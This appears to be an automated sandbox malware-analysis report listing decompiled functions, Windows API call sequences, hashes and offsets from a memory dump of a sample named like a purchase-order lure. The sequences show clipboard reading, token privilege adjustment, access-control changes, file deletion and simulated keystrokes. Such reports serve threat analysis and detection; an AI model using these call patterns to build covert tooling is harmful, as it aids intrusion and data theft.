                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 3850602802-328681919
                                                                                        • Opcode ID: 0800842ba406c56e348d977171c00c1487d0a6df1bad51614ffbe123f8956d9e
                                                                                        • Instruction ID: 49033d2accf0f6c3398f3b80474a12eecda2c30830dd994cf35c4d609d02e825
                                                                                        • Opcode Fuzzy Hash: 0800842ba406c56e348d977171c00c1487d0a6df1bad51614ffbe123f8956d9e
                                                                                        • Instruction Fuzzy Hash: DF12BC71600248AFEB259F64CC8AFAE7BF8EF45714F1441ADF919EB290DBB08941CB51
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00B7EB4A
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD3AEA
                                                                                        • IsIconic.USER32(000000FF), ref: 00BD3AF3
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00BD3B00
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00BD3B0A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BD3B20
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BD3B27
                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00BD3B33
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BD3B44
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BD3B4C
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00BD3B54
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00BD3B57
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B6C
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3B77
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B81
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3B86
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B8F
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3B94
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B9E
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3BA3
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00BD3BA6
                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00BD3BCD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: a93c22246e27ecf47a7267f26ba4dbce8f924c8bdd118ffbc04d97914b45bc65
                                                                                        • Instruction ID: 7d8a0c94841165705e52374f6205162c9bb3579fcac00390b7e9687ead8619bb
                                                                                        • Opcode Fuzzy Hash: a93c22246e27ecf47a7267f26ba4dbce8f924c8bdd118ffbc04d97914b45bc65
                                                                                        • Instruction Fuzzy Hash: 02318371A403587FEB205B658C89F7F7EACEB44B50F104066FA05EB2D1DAF15D00AAA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                                                          • Part of subcall function 00B9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                                                          • Part of subcall function 00B9B134: GetLastError.KERNEL32 ref: 00B9B1BA
                                                                                        • _memset.LIBCMT ref: 00B9AD08
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B9AD5A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B9AD6B
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B9AD82
                                                                                        • GetProcessWindowStation.USER32 ref: 00B9AD9B
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00B9ADA5
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B9ADBF
                                                                                          • Part of subcall function 00B9AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B9ACC0), ref: 00B9AB99
                                                                                          • Part of subcall function 00B9AB84: CloseHandle.KERNEL32(?,?,00B9ACC0), ref: 00B9ABAB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: 02cba09199fdd5b1fa30bfffb8070736969a3b1f4d393a116b1045ff821d800f
                                                                                        • Instruction ID: a3dad2f4c8354905c0269fe348cad7c1b34152a8d9444713054c5c1fee629e20
                                                                                        • Opcode Fuzzy Hash: 02cba09199fdd5b1fa30bfffb8070736969a3b1f4d393a116b1045ff821d800f
                                                                                        • Instruction Fuzzy Hash: AB81AE71900249AFDF11DFA4DC85AEEBBB9FF04304F2441A9F814A7161DB718E54DBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BA5FA6,?), ref: 00BA6EF1
                                                                                          • Part of subcall function 00BA725E: __wsplitpath.LIBCMT ref: 00BA727B
                                                                                          • Part of subcall function 00BA725E: __wsplitpath.LIBCMT ref: 00BA728E
                                                                                          • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                                                        • _wcscat.LIBCMT ref: 00BA6149
                                                                                        • _wcscat.LIBCMT ref: 00BA6167
                                                                                        • __wsplitpath.LIBCMT ref: 00BA618E
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BA61A4
                                                                                        • _wcscpy.LIBCMT ref: 00BA6209
                                                                                        • _wcscat.LIBCMT ref: 00BA621C
                                                                                        • _wcscat.LIBCMT ref: 00BA622F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00BA625D
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA626E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA6289
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA6298
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA62AD
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA62BE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BA62E1
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA62FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA630B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1917200108-1173974218
                                                                                        • Opcode ID: a5511be55b630da0a7453cba63871d19c2acd932e1d4b6c9fe4fd7c551dab842
                                                                                        • Instruction ID: 95af64256169a5a7254ec29deeab4ae536d8d91651ab9a300ad389a20c76143c
                                                                                        • Opcode Fuzzy Hash: a5511be55b630da0a7453cba63871d19c2acd932e1d4b6c9fe4fd7c551dab842
                                                                                        • Instruction Fuzzy Hash: 5F5100B280C25C6ACB21EB95CC84EEB77FCAF05300F0905E6E545E3141DE769B498F94
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00BFDC00), ref: 00BB6B36
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BB6B44
                                                                                        • GetClipboardData.USER32(0000000D), ref: 00BB6B4C
                                                                                        • CloseClipboard.USER32 ref: 00BB6B58
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BB6B74
                                                                                        • CloseClipboard.USER32 ref: 00BB6B7E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BB6B93
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00BB6BA0
                                                                                        • GetClipboardData.USER32(00000001), ref: 00BB6BA8
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BB6BB5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BB6BE9
                                                                                        • CloseClipboard.USER32 ref: 00BB6CF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: 6173a1b300d9987a911fdf078f36c7e73fa509ec01540e840091e83b5489383a
                                                                                        • Instruction ID: 5fcafcf4b11c143b76800dff9b7d35d70b315751a31afc0a252d2b6f49ff1f2d
                                                                                        • Opcode Fuzzy Hash: 6173a1b300d9987a911fdf078f36c7e73fa509ec01540e840091e83b5489383a
                                                                                        • Instruction Fuzzy Hash: 80517D71204241AFD310AB64DD96FBE7BF8EB94B00F040569F686DB1D1DFB8DD098A62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BAF62B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BAF67F
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BAF6A4
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BAF6BB
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BAF6E2
                                                                                        • __swprintf.LIBCMT ref: 00BAF72E
                                                                                        • __swprintf.LIBCMT ref: 00BAF767
                                                                                        • __swprintf.LIBCMT ref: 00BAF7BB
                                                                                          • Part of subcall function 00B8172B: __woutput_l.LIBCMT ref: 00B81784
                                                                                        • __swprintf.LIBCMT ref: 00BAF809
                                                                                        • __swprintf.LIBCMT ref: 00BAF858
                                                                                        • __swprintf.LIBCMT ref: 00BAF8A7
                                                                                        • __swprintf.LIBCMT ref: 00BAF8F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 835046349-2428617273
                                                                                        • Opcode ID: ea23cda50cc844a9fb81a8db2b715dafd97ba1b854372a92ea473b8e2f7c3a68
                                                                                        • Instruction ID: 29c18b6676c035335216c34482a48bcc11d40f590b6f7ce5c6598de7da9ca1e3
                                                                                        • Opcode Fuzzy Hash: ea23cda50cc844a9fb81a8db2b715dafd97ba1b854372a92ea473b8e2f7c3a68
                                                                                        • Instruction Fuzzy Hash: B4A10CB2508345ABC310EBA4C885DBFB7ECEF98704F444C6EB69587151EB34DA49CB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00BB1B50
                                                                                        • _wcscmp.LIBCMT ref: 00BB1B65
                                                                                        • _wcscmp.LIBCMT ref: 00BB1B7C
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00BB1B8E
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00BB1BA8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BB1BC0
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1BCB
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00BB1BE7
                                                                                        • _wcscmp.LIBCMT ref: 00BB1C0E
                                                                                        • _wcscmp.LIBCMT ref: 00BB1C25
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB1C37
                                                                                        • SetCurrentDirectoryW.KERNEL32(00C139FC), ref: 00BB1C55
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB1C5F
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1C6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1C7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: 54c9c5d947cf8bb879103a031f8e1eb08c344fda9720f1309efb00390a874a9f
                                                                                        • Instruction ID: 464b60b4d5ffcab802eff19c8ee30401de147d96d5f251d15e9d09dafc97720f
                                                                                        • Opcode Fuzzy Hash: 54c9c5d947cf8bb879103a031f8e1eb08c344fda9720f1309efb00390a874a9f
                                                                                        • Instruction Fuzzy Hash: 3631B6315012596FDF20EFA8DC99AEE7BECEF05310F5049D5E911E7090EBB0DE858A64
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00BB1CAB
                                                                                        • _wcscmp.LIBCMT ref: 00BB1CC0
                                                                                        • _wcscmp.LIBCMT ref: 00BB1CD7
                                                                                          • Part of subcall function 00BA6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BA6BEF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BB1D06
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1D11
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00BB1D2D
                                                                                        • _wcscmp.LIBCMT ref: 00BB1D54
                                                                                        • _wcscmp.LIBCMT ref: 00BB1D6B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB1D7D
                                                                                        • SetCurrentDirectoryW.KERNEL32(00C139FC), ref: 00BB1D9B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB1DA5
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1DB2
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1DC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 90292b50250f4f6c090b6fdbc141758ae4f8d4c3b93c89e70879e15ca4cecacb
                                                                                        • Instruction ID: 5010bcd8d5f669f3dbb0b02144ab12541a30d498324fa298799830da1931ee92
                                                                                        • Opcode Fuzzy Hash: 90292b50250f4f6c090b6fdbc141758ae4f8d4c3b93c89e70879e15ca4cecacb
                                                                                        • Instruction Fuzzy Hash: BF31F43250165A6BCF10EFA8DC59AEE37EDDF05324F5049E1E901A70A0DBB0DE85CB64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                        • API String ID: 2102423945-2023335898
                                                                                        • Opcode ID: 9e296ae24dceb627a7454ea218b077095307a2dcb3a7eaf159e171784290ec75
                                                                                        • Instruction ID: 8a987d2f8e6ec86222711baf2ed6104b018c9aa0ec70a7723f4f5eeaaf07cc73
                                                                                        • Opcode Fuzzy Hash: 9e296ae24dceb627a7454ea218b077095307a2dcb3a7eaf159e171784290ec75
                                                                                        • Instruction Fuzzy Hash: 71829071D0421ADBCB24CF94C8806ADBBF1FF48314F2581EAD85AAB351E7789D85DB90
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00BB09DF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB09EF
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB09FB
                                                                                        • __wsplitpath.LIBCMT ref: 00BB0A59
                                                                                        • _wcscat.LIBCMT ref: 00BB0A71
                                                                                        • _wcscat.LIBCMT ref: 00BB0A83
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB0A98
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0AAC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0ADE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0AFF
                                                                                        • _wcscpy.LIBCMT ref: 00BB0B0B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB0B4A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 3566783562-438819550
                                                                                        • Opcode ID: a82b2e9d2a795247821af482bd41eb8c71b49af25815ef8352d678405b985df8
                                                                                        • Instruction ID: 4087c14fb702fdf65c3b486edb4fae555819c27f8d76b5767b4952e00019e195
                                                                                        • Opcode Fuzzy Hash: a82b2e9d2a795247821af482bd41eb8c71b49af25815ef8352d678405b985df8
                                                                                        • Instruction Fuzzy Hash: EE617A725183059FD710EF64C8809AFB3E8FF89310F0489AAF989C7251DB75E949CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                                                          • Part of subcall function 00B9ABBB: GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                                                          • Part of subcall function 00B9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                                                          • Part of subcall function 00B9ABBB: HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                                                          • Part of subcall function 00B9AC56: GetProcessHeap.KERNEL32(00000008,00B9A6B5,00000000,00000000,?,00B9A6B5,?), ref: 00B9AC62
                                                                                          • Part of subcall function 00B9AC56: HeapAlloc.KERNEL32(00000000,?,00B9A6B5,?), ref: 00B9AC69
                                                                                          • Part of subcall function 00B9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B9A6B5,?), ref: 00B9AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B9A6D0
                                                                                        • _memset.LIBCMT ref: 00B9A6E5
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9A704
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A715
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B9A752
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B9A76E
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A78B
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B9A79A
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B9A7A1
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B9A7C2
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00B9A7C9
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9A7FA
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B9A820
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9A834
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: f05d59aebac56e52c159f23d7829bfd87e4d337b4ca16c0fab9cebe5c7e643ee
                                                                                        • Instruction ID: 15efa3c7e71a83125500b19a300ee5027f2b2d2d294dd96076e697bf2baa4685
                                                                                        • Opcode Fuzzy Hash: f05d59aebac56e52c159f23d7829bfd87e4d337b4ca16c0fab9cebe5c7e643ee
                                                                                        • Instruction Fuzzy Hash: 2D514A71900249AFDF10DFA5DC95AEEBBF9FF04300F048169F911AB291DB759A06CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
